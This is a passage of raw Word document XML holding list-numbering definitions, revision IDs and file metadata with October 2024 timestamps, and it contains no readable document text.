    <w:sectPr w:rsidR="00A24B8C" w:rsidRPr="00B62F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BD092C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C6CD0B4"/>
    <w:lvl w:ilvl="0" w:tplc="A334720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BBD2D15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F1811F2"/>
    <w:lvl w:ilvl="0" w:tplc="7892DAC0"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72057CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A16E812"/>
    <w:lvl w:ilvl="0" w:tplc="8F262638">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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num w:numId="1" w16cid:durableId="140121664">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1833719118">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="110322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A38"/>
    <w:rsid w:val="000E219C"/>
    <w:rsid w:val="001A581C"/>
    <w:rsid w:val="002E3AA2"/>
    <w:rsid w:val="006619E3"/>
    <w:rsid w:val="00816C00"/>
    <w:rsid w:val="00872A77"/>
    <w:rsid w:val="00A24B8C"/>
    <w:rsid w:val="00A35A3B"/>
    <w:rsid w:val="00AA35BE"/>
    <w:rsid w:val="00B62DEA"/>
    <w:rsid w:val="00B62FCC"/>
    <w:rsid w:val="00C145DF"/>
    <w:rsid w:val="00CC648E"/>
    <w:rsid w:val="00D577BD"/>
    <w:rsid w:val="00D92D64"/>
    <w:rsid w:val="00DA5A38"/>
    <w:rsid w:val="00E302F2"/>
    <w:rsid w:val="00E47AD3"/>
    <w:rsid w:val="00ED5268"/>
    <w:rsid w:val="00F81310"/>
    <w:rsid w:val="00F9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BDF6F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{984E87E2-7870-4DEC-8B8D-FABEBBBF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A5A3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A5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A5A3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A5A3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5A3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5A3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5A3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A5A3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A5A3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A5A3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A5A3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A5A3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A5A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A5A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A5A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A5A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A5A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A5A3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A5A3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A5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A5A3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A5A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A5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A5A3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A5A3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A5A3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A5A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A5A3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A5A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2024-10-15T07:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-15T11:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>